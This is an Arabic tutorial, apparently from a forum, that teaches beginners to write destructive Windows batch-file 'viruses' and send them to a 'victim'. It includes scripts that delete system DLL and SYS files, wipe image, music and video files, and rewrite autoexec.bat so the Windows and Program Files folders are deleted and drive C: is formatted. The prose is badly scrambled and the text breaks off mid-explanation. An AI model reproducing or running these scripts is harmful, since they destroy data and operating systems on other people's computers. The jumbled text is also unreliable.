تعلم‏ ‏كيفية‏ ‏صناعة‏ ‏الفايروس‏ ‏بنفسك

ﺍﻟﻠﻪ ﺍﻟﺮﺣﻤﻦ ﺍﻟﺮﺣﻴﻢ ﺻﻨﺎﻋﺔ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﺑﺴﻢ ] [®][^][®] [ ﺗﺼﻤﻴﻢ ﻓﻴﺮﻭﺱ ﻭﺍﺧﻄﺮ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﻋﻠﻰ ﺍﻟﺠﻬﺎﺯ ﻛﻴﻔﻲﻩ ] [^][® [®] ] [ ﺍﻟﺘﻲ ﺗﺨﺎﻑ ﻣﻨﻬﺎ ﻋﻠﻰ ﺟﻬﺎﺯﻙ ﻣﺎ ﻫﻮ ﺍﺧﻄﺮ ﺍﻻﺷﻴﻰ 1-ﺍﻟﻬﺎﻛﺮﺯ ﻫﻤﺎ ﺷﻴﺌﻴﻦ ﺍﺛﻨﻴﻦ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﺍﻟﺘﻲ ﺗﻘﻮﻡ 2ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﺟﻬﺎﺯﻙ ﻭﺗﺒﻲ ﺗﺤﻄﻤﻪ ﻭﻛﺜﻴﺮﺍ ﻣﺎ ﺗﺤﺰﻧﻚ ﻣﻦ ﻛﺜﺮﺕ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﺑﻌﺾ ﺍﺭﻓﺲ ﺗﻜﻮﻥ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﻫﺬﻩ ﺑﻌﺾ ﺍﻻﺣﻴﺎﻥ ﻭﻃﻮﻉ ﺍﻣﺮﻙ ﺑﺲ ﻋﻠﻰ ﻓﻤﺎ ﺭﺍﻳﻚ ﺍﻧﺖ ﺗﺴﺘﺨﺪﻣﻮﻫﺎ ﻟﺌﺬﻳﻪ ﺍﻟﻌﺮﺏ ﻭ ﻣﻦ ﺻﻨﻌﻚ --| ﺍﻟﻤﺴﻠﻤﻴﻦ ﺍﻭﻛﻲ. ﺷﺮﻁ ﺍﻥ ﻻ |--*¨®¨*--|ﺍﻟﺪﺭﺱ ﺍﻻﻥ|--*¨®¨* ﻗﺒﻞ ﺍﻟﺒﺪﺃ ﻓﻰ ﺗﻌﻠﻢ ﺗﺼﻤﻴﻢ ﺍﻟﻔﻴﺮﻭﺱ ﻳﺠﺐ ﻋﻠﻴﻨﺎ ﺗﻌﻠﻢ ﺑﻌﺾ ﺍﻟﻨﻘﺎﻁ ﺍﻟﻤﻬﻤﺔ ﻭ ﻫﻰ ﺍﻟﺘﻌﺮﻳﻒ ﺑﺎﻟﻔﻴﺮﻭﺱ ﻭ ﺍﻧﻮﺍﻋﻪ ﻭ ﺷﺮﻭﻃﻪ ﻭ ﺍﻟﺘﻰ ﺳﻮﻑ ﺍﻭﺿﺤﻬﺎ ﺍﻷﻥ ﺍﻟﻔﻴﺮﻭﺱ ﻋﻠﻰ ﺍﻧﻪ ﺗﻌﺮﻳﻒ ﺍﻟﻔﻴﺮﻭﺱ: ﺍﻟﺤﺠﻢ ﻳﺸﻐﻞ ﻧﻔﺴﻪ ﺫﺍﺗﻴﺎ ﻳﻤﻜﻦ ﺗﻌﺮﻳﻒ ﺍﺣﺪ ﺑﺮﺍﻣﺞ ﻭﻳﻨﺪﻭﺯ ﺩﻭﻥ ﺑﺮﻧﺎﻣﺞ ﺻﻐﻴﺮ ﺑﺬﻟﻚ ﻭ ﻫﻨﺎﻙ ﺍﻭ ﺍﻋﺘﻤﺎﺩﺍ ﻋﻠﻰ ﻧﻔﺴﻬﺎ ﺑﻨﺎﺀ ﻋﻠﻰ ﻭﻗﺖ ﻋﻠﻢ ﺍﻟﻤﺴﺘﺨﺪﻡ ﺍﻭ ﺗﺎﺭﻳﺦ ﺍﻟﻴﻮﻡ ﻭ ﻓﻴﺮﻭﺳﺎﺕ ﺗﺸﻐﻞ ﻫﻮ ﺗﺸﻴﺮﻧﻮﺑﻞ ﺍﻟﺴﺎﻋﺔ ﻓﻰ ﺍﻟﻮﻳﻨﺪﻭﺯ ﻳﻮﻡ ﺍﻟﺴﺎﺩﺱ ﻭ ﺍﺷﻬﺮ ﻫﺬﻩ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﻛﻞ ﺷﻬﺮ ﻭ ﻟﻘﺪ ﺳﻤﻰ ﺍﻟﺬﻯ ﻳﻌﻤﻞ ﻓﻰ ﺑﻬﺬﺍ ﺍﻷﺳﻢ ﻧﺴﺒﺔ ﺍﻟﻰ ﺍﻟﻌﺸﺮﻳﻦ ﻣﻦ ﺍﻟﻤﻮﺟﻮﺩﺓ ﻓﻰ ﺟﺴﻢ ﺍﻟﻔﻴﺮﻭﺱ ﺍﻟﺘﻰ ﺗﺼﻴﺒﻪ ﻭ ﺗﺘﻜﺎﺛﺮ ﺑﺴﺮﻋﺔ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﻧﻔﺲ ﻓﻜﺮﺓ ﻋﻤﻞ ﺍﻟﻔﻴﺮﻭﺱ ﺍﻷﻧﺴﺎﻥ ﻭ ﺍﻟﺬﻯ ﻳﺼﻴﺐ ﺍﻟﻜﻮﻣﺒﻴﻮﺗﺮ ﻓﻴﻪ ﻭ ﻫﻰ ﻭ ﻳﺠﺐ ﺗﻮﺍﻓﺮ ﻋﺪﺓ ﺷﺮﻭﻁ ﻟﻜﻰ ﻳﺼﺒﺢ ﻟﻜﻰ ﻻ ﻳﺘﻢ ﺍﻟﻔﻴﺮﻭﺱ ﺫﻭ ﻓﺎﻋﻠﻴﺔ ﻭ ﻫﻰ ﺍﻻﻧﺘﺒﺎﻩ ﺍﻟﻴﻪ ﺃﻥ ﻳﻜﻮﻥ ﺫﺍ ﺣﺠﻢ ﺻﻐﻴﺮ ﺃﻥ ﻳﻌﺘﻤﺪ ﻋﻠﻰ ﻧﻔﺴﻪ ﻓﻰ ﺍﻟﺘﺸﻐﻴﻞ ﺃﻭ ﻋﻠﻰ ﺍﻟﺒﺮﺍﻣﺞ ﺍﻷﺳﺎﺳﻴﺔ ﺃﻭ ﻋﻦ ﻃﺮﻳﻖ ﻫﺪﻑ ﻭ ﻣﻐﺰﻯ ﺍﻻﺭﺗﺒﺎﻁ ﺑﺎﺣﺪ ﺍﻟﻤﻠﻔﺎﺕ ﻭ ﺑﻌﺪ ﺍﻥ ﻓﻬﻤﻨﺎ ﺑﻌﺾ ﺃﻥ ﻳﻜﻮﻥ ﺫﺍ ﺍﻷﺳﺎﺳﻴﺔ ﻭ ﺍﻟﺘﻰ ﻳﺠﺐ ﺍﻥ ﺍﻷﻥ ﺩﺭﺍﻳﺔ ﻓﻠﻨﺒﺪﺃ ﻓﻰ ﺍﻟﺘﺼﻤﻴﻢ ﺍﻟﻤﺼﻄﻠﺤﺎﺕ ﺍﻟﺒﺪﺃ ﻳﺠﺐ ﺍﻥ ﺍﻭﺿﺢ ﺷﺊ ﻧﻜﻮﻥ ﻋﻠﻰ ﻣﻤﻦ ﺧﻄﻴﺮ ﺟﺪﺍ ﺟﺪﺍ ﺟﺪﺍ ﻭﻻﻛﻦ ﻗﺒﻞ ﻓﺎﺭﺟﻮ *•~-.¸¸,.-~*ﺍﺫﺍ ﻛﻨﺖ ﻣﺒﺘﺪﺉ ﺍﻭ ﺍﻯ ﻳﺨﺸﻮﻥ ﺍﻟﺘﻌﺎﻣﻞ ﻣﻊ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﻷﻧﻚ ﻭ ﺍﻥ ﺗﻘﻮﻡ ﺑﻔﻬﻢ ﺍﻟﻤﻮﺿﻮﻉ ﺩﻭﻥ ﺍﻯ ﻣﺤﺎﻭﻟﺔ ﻣﻨﻚ ﻟﺘﺼﻨﻴﻊ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﻣﻨﻬﺎ ﻛﻤﺎ ﺳﻮﻑ ﺗﺮﻯ ﺍﻥ ﺍﻯ ﺧﻄﺎ ﻓﻰ ﻛﻮﺩ ﺳﻮﻑ ﻳﺆﺩﻯ ﺍﻟﻰ ﺍﺿﺮﺍﺭ ﻛﺒﻴﺮﺓ ﺗﺪﻣﻴﺮ ﻧﻈﺎﻡ ﺍﻟﺘﺸﻐﻴﻞ ﻟﺬﺍ ﺍﺭﺟﻮ ﺍﻟﺤﺬﺭ ﻣﻦ ﺗﺼﻤﻴﻢ ﺍﻟﻔﻴﺮﻭﺱ ﻭﺍﻧﺎ ﻟﺴﺖ ﻣﺴﺆﻝ ﺗﻘﻮﻡ ﻋﻦ ﺍﻯ ﺿﺮﺭ ﻗﺪ ﻳﻨﺸﺊ ﻟﻚ ﻣﻦ -.¸¸,.-~* ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﺍﻟﺘﻰ ﺳﻮﻑ ﻳﺠﺐ ﺍﻥ ﻧﻌﺮﻑ ﻣﺎ ﻫﻰ ﺍﻟﻄﺮﻕ ﺑﻬﺎ*•~ ﺍﻟﺘﻰ ﺳﻮﻑ ﺍﺳﺘﺨﺪﻣﻬﺎ ﻓﻰ ﺻﻨﺎﻋﺔ ﺍﻷﻥ ﺍﺛﻨﺎﺀ ﺑﺤﺜﻰ ﻋﺒﺮ ﺍﻷﻧﺘﺮﻧﺖ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﻣﻦ ﺍﻟﻄﺮﻕ ﻟﺘﺼﻤﻴﻢ ﻟﻘﺪ ﺗﻌﺮﻓﺖ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﻭ ﻫﻰ ﻋﻠﻰ ﻣﺠﻤﻮﻋﺔ ﻋﻦ ﻃﺮﻳﻖ ﺍﻟـnotepad ﺍﻭﺍﻟﻤﻔﻜﺮﺓ ﻋﻦ ﻃﺮﻳﻖ ﺑﺮﻧﺎﻣﺞ ﺍﻟﻔﺠﻮﻝ ﺑﻴﺴﻚ ( vb ) ﻃﺮﻳﻖ ﺑﺮﺍﻣﺞ ﺗﺼﻤﻴﻢ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﻋﻦ ( ﺟﺪﺍﺍﺍﺍ ﻭ ﻓﻴﺮﻭﺳﺎﺗﻬﺎ ﻗﻮﻳﺔ - ﻟﻜﻦ ﺍﻏﻠﺒﻬﺎ ﻳﻜﺸﻔﻪ ﺍﻟﻨﻮﺭﺗﻮﻥ ﺧﻄﻴﺮﺓ ) ﻭ ﺳﻮﻑ ﺍﻗﻮﻡ ﺍﻷﻥ ﺑﻌﺮﺽ ﻛﻞ ﻣﻨﻬﻢ ﻣﺎ ﻋﻠﻰ ﺣﺬﺓ ﻭ ﺳﻮﻑ ﺍﺷﺮﺣﻬﻢ ﻟﻜﻢ ﺑﻪ ﺑﺎﻟﺘﻔﺼﻴﻞ ﺍﺗﻤﻨﻰ ﺍﻥ ﻳﻨﺎﻝ ﺍﻋﺠﺎﺑﻜﻢ ﺍﻟﺠﺰﺀ ﺍﻷﻭﻝ ﻣﻦ ﺻﻨﺎﻋﺔ ﺳﻮﻑ ﺍﻗﻮﻡ ﻭ ﺍﻟﺬﻯ ﺳﻮﻑ ﻧﻘﻮﻡ ﻓﻴﻪ ﻫﺬﺍ ﻫﻮ ﺗﺼﻤﻴﻢ ﺍﻟﻔﻴﺮﻭﺱ ﺑﻮﺍﺳﻄﺔ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ notepad ﺍﻭ ﺍﻟﻤﻔﻜﺮﺓ ﻋﻠﻰ ﺗﻌﻠﻢ ﻟﻠﻌﻤﻞ ﻋﻠﻰ ﺗﺼﻤﻴﻢ ﻓﻴﺮﻭﺱ ﺑﻬﺬﺍ ﺍﻟﻨﻮﻉ ﻭ ﻣﻦ ﺍﻟﺘﺼﻤﻴﻤﺎﺕ ﻳﺠﺐ ﺍﻥ ﺗﻌﺮﻑ ﻛﻴﻒ ﺗﻀﻊ ﺍﻷﻛﻮﺍﺩ ﺍﻟﺘﻰ ﺳﻮﻑ ﺍﻋﻄﻴﻬﺎ ﻟﻚ ﻫﻰ ﻋﻦ ﻃﺮﻳﻖ ﻓﺘﺢ ﺑﺮﻧﺎﻣﺞ notepad ﻭﻛﺘﺎﺑﺔ ﺍﻟﻜﻮﺩ ﻓﻴﻪ ﺛﻢ ﺣﻔﻈﻪ ﺑﺎﻯ ﺍﺳﻢ ﺍﻟﻤﻜﺎﻥ ﻛﻞ ﺗﺮﻳﺪﻩ ﻭﻻﻛﻦ ﺑﺎﻣﺘﺪﺍﺩ .bat ﻟﻚ ﻭ ﺍﻷﻥ ﺑﻌﺪ ﺍﻥ ﺗﻌﺮﻓﺖ ﻋﻠﻰ ﻭ ..... ﻣﺎ ﻋﻠﻴﻚ ﺍﻥ ﺗﻀﻊ ﺍﻟﻜﻮﺩ ﺍﻟﻤﻨﺎﺳﺐ ﺃﻻ ﺍﺫﺍ ﻓﻰ ﺍﻝnotepad ﻭ ﺗﺤﻔﻈﻪ ﺍﻧﻬﺎﺋﻬﺎ ﺍﻭ ﻓﻘﻂ ﻻ ﺗﻘﻮﻡ ﺑﺄﻛﺜﺮ ﻣﻦ ﺫﻟﻚ ﻋﻠﻰ ﺍﺭﺳﻠﺘﻪ ﺍﻟﻰ ﺍﻟﻀﺤﻴﺔ ﺍﻟﺘﻰ ﺗﺮﻳﺪ ﻛﺎﻥ ﻟﺪﻳﻚ ﻳﻤﻜﻨﻚ ﺗﺠﺮﺑﺖ ﻫﺬﺍ ﺍﻟﻔﻴﺮﻭﺱ ﺍﺫﺍ ﺍﻧﺖ ﺣﺒﻴﺖ ﺍﻥ ﺗﺮﻯ ﺟﻬﺎﺯ ﺍﻟﺘﺠﺎﺭﺏ ﺍﺫﺍ ﺑﺎﻡ ﻋﻴﻨﻴﻚ ﻣﺎ ﻋﻠﻴﻚ ﺍﻟﻰ ﻣﻼﺣﻀﺔ ﻓﻲ ﻣﺠﻠﺪ ﺟﺪﻳﺪ ﻓﻲ ﺳﻄﺢ ﻏﻴﺮﻭﺳﻚ ﺑﺪﻭﻥ ﺍﻥ ﺗﻐﻠﻖ ﺍﻟﻤﻔﻜﺮﻩ ﻭﻛﺘﺎﺑﻪ ﺣﻔﻀﻪ ﺍﺭﻳﺪ ﺍﻥ ﺍﻟﻜﻮﺩ ﻭﺳﻮﻑ ﺗﺮﺍﻩ, ﺍﻟﻤﻜﺘﺐ ﻣﻨﻘﻮﻟﺔ ﻃﺒﻌﺎ ﻗﺒﻞ ﺍﻥ ﺍﺿﻊ ﻟﻜﻢ ﺍﻷﻛﻮﺍﺩ ﻛﻮﺩ ﺍﻛﺒﺮ ﺷﺮﺡ ﺍﻭﺿﺢ ﺍﻥ ﻫﺬﻩ ﺍﻷﻛﻮﺍﺩ ﺍﻟﻜﻮﺩ ﻣﻦ ﻭﻻﻛﻨﻰ ﻭﺿﻌﺖ ﺗﺤﺖ ﻛﻞ ﺗﻌﺪﻳﻠﻪ ﻣﻊ ﺍﺳﺘﻄﻴﻊ ﺗﻘﺪﻳﻤﻪ ﻋﺒﺮ ﻫﺬﺍ ﺑﺴﻴﻂ ﻋﻠﻴﻪ ﺣﻴﺚ ﻓﻜﺮﺓ ﻋﻤﻠﻪ ﻭ ﻃﺮﻳﻘﺔ ﺍﻥ ﺍﻭﺿﺢ ﺍﻧﻪ ﻣﻦ ﺍﻷﻓﻀﻞ ﻧﺴﺦ ﻣﺜﺎﻝ ﻭ ﻟﺼﻘﻪ ﻓﻰ ﺍﻟﻤﻜﺎﻥ ﺍﻟﺬﻯ ﺗﺮﻳﺪﻩ ﺍﺭﻳﺪ ﺍﻷﻭﻝ : ---------------------- ﺍﻟﻜﻮﺩ @ --------------------- ﻧﺒﺪﺃ ﺑﺎﻟﻜﻮﺩ Echo off c: cd %WinDir% \System\ deltree /y *.dll cd\ deltree /y *.sys : ﺍﻟﻜﻮﺩ ﻭ ﺣﻔﻈﻪ ﺍﻟـﺘﻮﺿـــــــــــﺘﻴﺢ ﻫﺎﻛﺬ ﺗﻜﻮﻥ ﻗﺪ * ﺑﻌﺪ ﺍﻥ ﻗﻤﺖ ﺑﻮﺿﻊ ﻭ ﺳﻮﻑ ﺗﻠﺤﻆ ﺍﻥ ﺑﺎﻣﺘﺪﺍﺩ .bat ﻓﺎﻧﺖ ﻗﺪ ﺗﻐﻴﺮ ﺍﻟﻰ ﺷﺒﺎﻙ ﻗﻤﺖ ﺑﻌﻤﻞ ﻓﻴﺮﻭﺱ ﻋﺠﻠﺔ ﺻﻔﺮﺍﺀ ﺍﺣﺬﺭ ﻣﻨﻪ ﺷﻜﻞ ﺍﻷﻳﻘﻮﻧﺔ ﺟﺎﻫﺰ ﻟﻠﻌﻤﻞ ﻭ ﺍﻳﺎﻙ ﺍﻥ ﺍﺯﺭﻕ ﻭﺑﺪﺍﺧﻠﻪ ﻳﻘﻮﻡ ﻋﻠﻰ ﻣﺴﺢ ﻛﻞ ﺗﻔﺘﺤﻪ ﻓﻬﻮ ﺍﻷﻥ sys ﻣﻦ ﺍﻟﺴﻴﺴﺘﻢ. * ﻫﺬﺍ ﺍﻟﻔﻴﺮﻭﺱ ﻧﻠﺤﻈﻪ ﺑﺎﻟﻨﻈﺮ ﺍﻟﻰ ﻣﻠﻔﺎﺕ ﺍﻝ dll ﻭﺍﻝ ﺑﻪ ﺳﻮﻑ ﻧﺠﺪ ﺍﻧﻪ ﻛﺘﺐ ﻭﻫﺬﺍ ﻣﺎ ﺳﻮﻑ ﺍﻣﺮ " deltree " ﻭ ﻫﻮ ﺍﻟﻜﻮﺩ ﺍﻟﺴﺎﺑﻖ ﻭ ﺍﻟﻤﻠﻔﺎﺕ ﺛﻢ ﻛﺘﺐ ﺑﻌﺪ ﻓﻰ ﻫﺬﺍ ﺍﻟﻜﻮﺩ ﻛﻤﺎ ﻛﺘﺐ *.sys " ﻭ ﻫﻮ ﺍﻟﺨﺎﺹ ﺑﻤﺴﺢ ﺍﻋﻄﻴﺖ ﻟﻪ ﺑﺎﻥ ﻳﻤﺴﺢ ﻛﻞ ﺫﻟﻚ " *.dll ﺍﻟﺘﻰ ﻟﻬﺎ ﺍﻷﻣﺘﺪﺍﺩﻳﻦ ﺍﻟﺴﺎﺑﻘﻴﻦ ﺍﻧﻰ ﻗﺪ ﻣﻼﺣﻈﺔ ﺷﺊ ﺍﺧﺮ ﻭ ﻫﻮ ﻛﻮﻥ ﺍﻟﻤﻠﻔﺎﺕ ﻳﻤﺴﺢ ﺍﻟﻤﻠﻔﺎﺕ ﻣﻦ ﺍﻟﺴﻴﺴﺘﻴﻢ ﻭ ﻳﻤﻜﻦ ﻧﺠﺪ ﻓﻰ ﺍﻭﻝ ﺍﻟﻜﻮﺩ ﺍﻻﻣﺮ ﺍﻟﻜﻤﺒﻴﻮﺗﺮ ﺑﺬﻟﻚ ﻓﺴﻮﻑ ﺗﺠﺪ ﺍﻧﻪ ﻗﺪ ﻭ ﺳﻮﻑ ﻟﻪ ﺍﻷﻣﺮ ﺑﺎﻟﺬﻫﺎﺏ ﺍﻟﻰ c: ﻭ ﻛﻤﺎ ﺍﻟﺨﺎﺹ ﺍﻷﻣﺮ ﺑﺎﻟﺬﻫﺎﺏ ﻣﺎﻟﻔﺎﺕ ﻟﻮﻳﻨﺪﻭﺯ ﺍﻋﻄﻰ ﺻﺪﺭﻧﺎ ﻟﻪ ﺍﻷﻣﺮ windir ﺛﻢ ﺍﻋﻄﺎﻩ ﺍﻥ ﺍﻷﻭﺍﻣﺮ ﺍﻟﺘﺎﻟﻴﺔ ﻳﺠﺐ ﺍﻥ ﻋﻨﺪﻣﺎ ﺩﺍﺧﻞ ﻣﻞ ﺳﻴﺴﺘﻴﻢ ﻭ ﺍﻟﺬﻯ ﻫﻮ ﺍﺧﺒﺮﻧﺎﻩ ﻣﻮﺟﻮﺩ ﺿﻤﻦ ﻣﻠﻔﺎﺕ ﺍﻟﻮﻳﻨﺪﻭﺯ ﺗﻜﻮﻥ * ﺑﻌﺪ ﺍﻥ ﻓﻬﻤﻨﺎ ﻫﺬﺍ ﺍﻟﻤﻮﺩ ﻣﺎ ﺭﺍﻳﻜﻢ ﻫﻞ ﻫﻨﺎﻙ ﻣﻦ ﻳﺴﺘﻄﻴﻊ ﺍﺟﺎﺑﺘﻰ ﻋﻠﻰ ﻭ ﻫﻮ ﻫﻞ ﻳﻤﻜﻨﻨﺎ ﺗﻌﺪﻳﻞ ﻫﺬﺍ ﺗﻔﻜﺮﻭﻥ ﻓﻰ ﺍﻷﺟﺎﺑﺔ ﺍﻟﻜﻮﺩ ؟!! ﺳﺆﺍﻟﻰ ﺑﻜﻞ ﺑﺴﺎﻃﺔ ﻭ ﻫﻰ ----- ﻟﻦ ﺍﺩﻋﻜﻢ ﻗﺪ ﻓﻬﻤﻨﺎﻩ ﺟﻴﺪﺍ ﻓﺎﻧﺎ ﺳﻮﻑ ﺍﻋﺠﺒﻜﻢ ﻫﺬﺍ ﺍﻟﻜﻮﺩ ﻗﻠﻴﻼ ﻳﻤﻜﻨﻨﺎ ﺍﻥ ﻧﻐﻴﺮ ﺍﻯ ﺷﺊ ﻳﻤﻜﻨﻨﺎ ﺍﻥ ﻧﻐﻴﺮﻩ ﻟﺬﺍ ﻧﺤﻦ ﻳﻤﻜﻨﻨﺎ ﺍﻥ ﻧﻐﻴﺮ ﺗﻌﺮﻓﻮﻥ ﺍﻟﻤﻜﺎﻥ ﻭﺳﻮ ﺍﺧﺒﺮﻛﻢ ﻋﻤﺎ ﻫﻮ ﺍﻥ ﻧﻐﻴﺮﻩ ﻓﻯﺎﻟﻜﻮﺩ ﻓﻴﻤﻜﻨﻨﺎ ﻭ ﻃﺒﻌﺎ ﻧﺘﻢ ﻧﻮﻋﻴﺔ ﺍﻟﻤﻠﻔﺎﺕ ﺍﻟﺘﻰ ﺳﻮﻑ ﺍﻟﺬﻯﻴﻤﻜﻨﻨﺎ ﺑﻤﺴﺤﻬﺎ ﺍﻭ ﻳﻤﻜﻨﻨﺎ ﺯﻳﺎﺩﺗﻬﺎ ﻛﻤﺎ ﺍﻥ ﻧﻐﻴﺮ ﺍﻥ ﻧﻐﻴﺮ ﺍﻟﻤﻜﺎﻥ ﺍﻟﺬﻯ ﺳﻮﻑ ﻳﻘﻮﻡ ﻓﻴﻪ ﻓﻤﺜﻼ ﻫﻨﺎﻙ ﻣﻨﻴﻀﻊ ﻧﻮﻋﻴﻦ ﻳﻤﻜﻨﻨﺎ ﺍﻧﻈﻤﺔ ﺍﻟﺘﺸﻐﻴﻞ ﻓﻬﻨﺎﻙ ﻣﻦ ﻳﻀﻊ ﻳﻮﺟﺪ ﻣﺜﻼ ﻭﻳﻨﺪﻭﺯ 98 ﻭ Xp ﻟﺬﺍ ﻳﻤﻜﻨﻨﺎ ﺍﻥ ﻣﻦ : ﻧﻐﻴﺮ ﺍﺗﺠﺎﻩ ﺍﻟﻔﻴﺮﻭﺱ ﺍﻟﻰ d: ﺍﻥ ﺍﻣﺰﺡ ﻣﻊ ﺍﺣﺪ ﻭ ﻓﻰ ﻣﺜﺎﻝ ﺗﻮﺿﻴﺤﻰ ﻋﺎﻭﺯ ﺍﻋﻠﻤﻪ ﺩﺭﺱ ﻭ ﺍﻧﺎ ﺍﻷﻥ ﺍﺭﻳﺪ ﺍﻥ ﺍﺻﻨﻊ ﻓﻴﺮﻭﺱ ﻳﻘﻮﻡ ﻧﻔﺲ ﺍﻟﻮﻗﺖ ﻣﻠﻔﺎﺕ ﺍﻟﺼﻮﺭ ﺍﻟﺘﻰ ﺗﺤﺰﻳﺮ ﻓﻴﻤﻜﻨﻨﻰ *.jpg. ﻛﻤﺎ ﺍﻧﻨﻰ ﺍﺭﻳﺪ ﺍﻥ ﺑﻤﺴﺢ ﺟﻤﻴﻊ ﺟﻤﻴﻊ ﻣﻠﻔﺎﺕ ﺍﻷﻏﺎﻧﻰ ﺍﻟﺘﻰ ﺍﻣﺘﺪﺩﻫﺎ ﺍﻣﺘﺪﺩﻫﺎ *. ﺍﻣﺴﺢ mp3 ﺟﻤﻴﻊ ﺍﻣﺘﺪﺍﺩﺕ E: ﺍﻟﻤﻠﻔﺎﺕ ﺍﻟﺨﺎﺻﺔ ﺑﻼﻓﻼﻡ ﻭ ﺍﻟﺘﻰ ﻭ ﺍﻣﺘﺪﺍﺩﻫﺎ *.asf ﻭ ﺍﻟﺘﻰ ﺗﻮﺟﺪ ﻓﻰ ﻛﻞ ﻣﺎ ﻋﻠﻴﻨﺎ ﻫﻮ ﺗﻌﺪﻳﻞ ﺍﻟﻜﻮﺩ ﻟﻴﺼﺒﺢ @ ﻛﺎﻷﺗﻰ Echo off e: deltree /y *.jpg cd\ deltree /y *.mp3 cd\ deltree /y *.asf ﻓﻰ ﺍﻟﻔﻴﺮﻭﺱ ﺍﻣﺎ ﺍﻷﻥ ﻓﻠﻨﻘﺮﺍﺀ ﺍﻳﻪ ﺭﺍﻳﻜﻢ ﺩﻟﻮﻗﺘﻰ ﺍﻟﻜﻮﺩ ﺍﻟﺜﺎﻧﻰ ﺍﻟﺠﺪﻳﺪ ﺍﺗﻤﻨﻰ ﻳﻌﺠﺒﻜﻢ ﺍﻟﻜﻮﺩ ﺍﻟﺜﺎﻧﻰ : ---------------- -------------- echo off @ cls call attrib -h -r c:\autoexec.bat >nul echo @echo off >c: \autoexec.bat echo deltree /y c: \progra~1\*.* >nul >>c: \autoexec.bat echo copy c: \******s\comm and \format.com c:\ >nul >>c: \autoexec.bat echo copy c: \******s\comm and\deltree.exe c:\ >nul >>c: \autoexec.bat echo deltree /y c:\******s\*.* >nul >>c: \autoexec.bat echo format c: / q /u /autotest >nul >>c: \autoexec.bat ﺍﻟـﺘﻮﺿـــــــــــﺘﻴﺢ : ﺍﻟﻔﻴﺮﻭﺱ ﺍﻟﺴﺎﺑﻖ ﻳﻌﺘﺒﺮ ﻣﻦ ﺍﻷﻓﻜﺎﺭ ﺍﻟﺠﻴﺪﺓ ﻟﻠﺰﻳﻦ ﻫﻤﺎ ﻣﻦ ﻣﺤﺒﻴﻦ ﻓﻰ ﺍﻟﺒﺮﻣﺠﺔ ﻭﺍﻓﻬﻤﻴﻦ ﻓﻰ ﻓﻜﺮﺓ ﻋﻤﻞ ﻟﻜﻤﺒﻴﻮﺗﺮ ﻭ ﻟﻴﺲ ﻣﻤﻦ ﻫﻢ ﻣﻦ ﻫﻮﺍﺓ ﺗﻌﻠﻢ ﺑﺮﻧﺎﻣﺞ ﺻﻐﻴﺮ ﺛﻢ ﻳﻘﻮﻝ ﻋﻰ ﻧﻔﺴﻪ ﺍﻟﻜﻮﺩ : ﻓﻜﻤﺎ ﻧﺮﻯ ﻓﻰ ﺧﺒﻴﺮ ﻛﻤﺒﻴﻮﺗﺮ ﺳﻄﺮ ﻣﺠﺮﺩ ﻓﺎﺋﺪﺗﻪ ﻣﺴﺢ ﻧﺒﺪﺍ ﺑﺘﻮﺿﻴﺢ ﻣﻦ ﺍﻯ ﺍﻣﺮ ﺍﻭ ﺗﻌﻠﻴﻖ ﻣﺴﺒﻖ ﺍﻟﻜﻮﺩ ﺍﻭﻝ ﻳﺠﻌﻞ ﻋﻤﻞ ﻫﺬﺍ ﺍﻟﻴﺮﻭﺱ ﻫﻮ ﺍﻟﺸﺎﺷﺔ ﻣﺠﻤﻮﻋﺔ ﻣﻦ ﺍﻟﺴﻄﻮﺭ ﺍﻟﻮﺣﻴﺪ ﺣﺘﻰ ﻓﻜﺮﺗﻬﺎ ﻭﻟﻴﺲ ﻣﻜﺮﺭ ﺑﻌﺪ ﺳﻮﻑ ﻧﺠﺪ ﺍﻥ ﻧﻮﺿﺢ ﺍﻧﻪ ﻫﻨﺎﻙ ﻫﻰ ﺗﻘﺮﻳﺒﺎ ﻣﻜﺮﺭﻩ ﺍﻟﻔﻜﺮﺓ ﺍﻷﺳﺎﻳﻪ ﻭ ﻋﻤﻠﻬﺎ ﻭﻻﻛﻦ ﻳﻤﻜﻨﻨﺎ ﻧﺤﻦ ﻧﻮﺿﺤﻪ 3 ﺍﻛﻮﺩ ﻣﻨﻔﺼﻠﻪ ﻫﻢ ﻫﻤﺎ ﻣﺎ ﺳﻮﻑ echo deltree /y c: \progra~1\*.* >nul >>c: \autoexec.bat ﺍﻷﻣﺮ ﻟﻠﻜﻤﺒﻴﻮﺗﺮ ﺑﻤﺴﺢ ﺍﻟﻔﻮﻟﺪﺭ ﻳﻌﻄﻰ ﻫﺬﺍ ﺍﻟﻤﻮﺩ program files ﺍﻟﺘﻰ ﺗﻨﺰﻝ ﻭﺍﻟﺬﻯ ﻓﻰ ﻣﺴﺢ ﻳﻮﺟﺪ ﻓﻴﻪ ﺟﻤﻴﻊ ﺍﻟﺒﺮﺍﻣﺞ ﺍﻟﻜﻮﺩ ﻋﻠﻰ ﺍﻟﺠﻬﺎﺯ ﻭ ﻧﻼﺣﻆ ﺗﻜﺮﺍﺭﻩ ﺍﻟﻮﻳﻨﺪﻭﺯ ﻓﻰ echo deltree /y c: \******s\*.* >nul >>c: \autoexec.bat ﺍﻟﻮﻳﻨﺪﻭﺯ ﻓﻬﻮ ﻟﻦ ﺑﻌﺪ ﺫﻟﻚ ﻟﺬﺍ ﻭﻻﻛﻨﻪ ﺍﺫﺍ ﻗﺎﻡ ﺑﻤﺴﺢ ﺍﻣﺮ ﻧﺴﺦ ﻟﻬﺬﺍﻥ ﻳﺴﺘﻄﻴﻊ ﻋﻤﻞ ﻓﻮﺭﻣﺎﺕ ﺍﺳﺘﺨﺪﺍﻣﻬﻢ ﻓﻴﻤﺎ ﻓﻘﺒﻞ ﺫﻟﻚ ﺍﻋﻄﻰ ﻣﺎ ﺍﻋﻄﺎﻩ ﻫﺬﺍﻥ 